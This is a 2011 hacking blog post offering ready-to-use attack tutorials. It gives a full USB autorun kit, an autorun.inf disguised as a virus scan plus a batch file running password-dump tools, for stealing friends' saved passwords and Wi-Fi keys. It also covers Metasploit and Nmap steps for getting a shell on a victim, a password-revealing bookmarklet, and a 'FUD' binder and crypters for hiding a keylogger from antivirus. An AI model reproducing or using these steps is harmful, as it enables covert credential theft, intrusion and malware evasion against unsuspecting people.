Tuesday 22 November 2011

STEAL PASSWORDS FROM YOUR FRIENDS’ COMPUTERS USING USB THIEF METHOD

How to steal passwords from a computer with USB in just seconds???



Guyz in this Tutorial i will tell you how to Steal/Hack someone’s computer passwords through USB Flash Drive…
Step 1: Create New/open notepad/wordpad…
Type or copy/paste Red Text below:-

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


Save this as AUTORUN.inf

Step 2: Open a new notepad/wordpad document…
Type or copy/paste Red Text below…


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt


Save this as LAUNCH.bat
Now you have 2 files…

Step 3: Copy the autorun and launch file to your USB…


Step 4: Go to http://www.nirsoft.net/
And download the programs which you named in Step 2

Step 5: Extract the files you downloaded to your desktop and copy all the .exe files to your USB…

Step 6: Remove and re-insert your USB…

Step 7: Click on the option “perform a virus scan”…
(this is an exemple, if you want it to say something else go to the autorun file and change it)…

Step 8: Now go to my computer and see usb drive, you will now see some text files, if you open them you will see usernames and passwords…

HOW TO HACK A COMPUTER USING METASPLOIT

Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.
1: help (show the commands)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine)
Note: To hack a computer using Metasploit first you should have the enough information of the target including:-

1: IP Address
2: Open Ports
3: Services Running
4: Version of Software Running


All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.
Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.
To choose an exploit following command is there:
Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]
Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.
Show payloads
Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.
RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)
Now the Last step is to type the following command and Launch attack to the computer.
Exploit:
After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.
Download Metasploit FrameWork

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT

I have written different hacking articles about Nmap and Metasploit. Now I am writing this article to teach how to hack a computer using these two great tools…
Just got to http://www.metasploit.com/ and download the Latest Framework (not the mini version).
Now open the metasploit console. And type the following commands:
1: db_create (this will create database needed for this attack)
2: TYPE nmap -sT –sV XXX.XXX.XXX.XXX( X be the IP address of victim)
Now give it time to scan and when it is complete type following command.
3: db_autopwn -p -t –e

This would start the penetration test and great thing about this is that it does not need any manual configuration. Every thing will be done automatically and if the test is successful a shell will be created.

REVEAL PASSWORDS UNDER ASTERISKS

Without using any software, you can reveal your password hidden under the asterisks on your browser with this javascript hack... After pasting the code, a dialog box will prompt and reveal your password...

The code :


javascript:(function()
{var s,F,j,f,i; s = “”; F = document.forms; for(j=0; j<F.length; ++j)
{ f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == “password”)
s += f[i].value + “n”; } } if (s) alert(“Passwords in forms on this page:nn” + s);
else alert(“There are no passwords in forms on this page.”);})();

SPEED UP YOUR INTERNET CONNECTION BY HACKING YOUR TCP/IP

TCP/IP HACK TOOLS:
It is best for downloading big files and big torrents…
Also for small files, it requires restart…
After you hack your TCP you have to RESTART your PC…


Torrents:
800 Megs of torrent file…
Not Hacked TCP/IP: Almost 4 hours…
Hacked TCP/IP: Hacked TCP/IP: Only 2 hours or 1 and a half…

Pure Download:
400 Megs… of file
Not Hacked TCP/IP: Almost 2 hours…
Hacked TCP/IP: Hacked TCP/IP: Only a half or 1 hour…

Some AVs say its a virus… Its a virus for them Bcz its a hacking tool… Its your decision to remove or clean this if you want and its your decision to if you want to use this tool…

Heres the recommended number for your TCP/IP:
80
70
60
90 is ok, not 100, your connection maybe laggish… Just try it…
Download Link

EASY BINDER v1.0 FUD

EAsy bunder + Icon Pack

Easy Binder is a tool that combines (binds) unlimited files (no matter their type) into a single standalone executable (a Container). The Container (the final bound file) is a simple compiled program that, when opened, will automatically launch the included files...



Easy Binder can run any type of file from the bound file without affecting its direct functionality. For instance, if you bind an executable, a text file and an image file, when the Container file is run, the executable will be run too while the other files will be opened with the default image file viewer (IrfanView, Paint etc.) and text file viewer (Notepad, Wordpad etc.)…

Easy Binder Features:

# unlimited files can be bound (joined)
# can bind any file type that is needed by the executable for a properly run
# the icon of the Host file (final bound file) can be changed
# the Host file (final bound file) is 100% FUD to all AV’s
# Its 100% Free


Download Link

FUD CRYPTER TO BYPASS ANTIVIRUS DETECTION FOR KEYLOGGERS

1. First of all Download Toxic Public Crypter.


2. Run Toxic Public Crypter.exe application on your computer system to see something like this:


3. Hit on “Input File” and select the server file you want to make undetectable from antiviruses. I have used  Rapzo Logger server (keylogger) over here. Now, check “Clone with file” and select File Clone. Make sure in this crypter you use the icon changer when you do crypt or else the file wont be 0/21 it will be 1/21 detected by Avira. Now, hit on “Crypt” and save your “Crypted.exe” file. It should look something like this:


This crypter also comes with stub.

Note: You don’t need to install software. Simply run “Toxic Public Crypter.exe” application.

35 CRYPTERS IN 1 – ALL IN 1 HACKING TOOLS

List of Crypters in the File:-

[RECOPILACION] Mingo Crypter V3.rar
Abigor Crypter.rar
Anka Crypter.rar
Archiless Crypter.rar
AsSaSin CrYpT.rar
Blackout Crypter.rar
Fly Crypter + Uniq Stub Generator.rar
Fly Crypter v2f.rar
Hacking Crypter.rar
Hackmeout Forums [HMO] Hacking and Security Fo…
HHC 1.4.0.rar
Infinity Crypter 2.rar
Infinity Crypter.rar
Jamaica Crypter.rar
Level-23 LuOpP CrYpT v1.2.rar
Level-23 LuOpP CrYpT V1.3.rar
LiQuid Vapour V2.0.rar
Mingo Crypter V1 Mod By MINGO.rar
Mingo Crypter V1(2).rar
Mingo Crypter V1.rar
Minguito Crypter.rar
Ohsin crypter.rar
Process Crypter.rar
Readme.txt
Rio 2016 Crypter.rar
SaW V1 Mod By LEGIONPR.rar
SceneCrypt.rar
Skull Crypter v4.rar
SnaKe Crypter.rar
Stonedinfect Crypter v1.0.rar
WTTiroloko FUD Crypter.rar
xCrypt v1.1 [Update FUD].rar
z0Indetectables X Crypter.rar

Download Crypters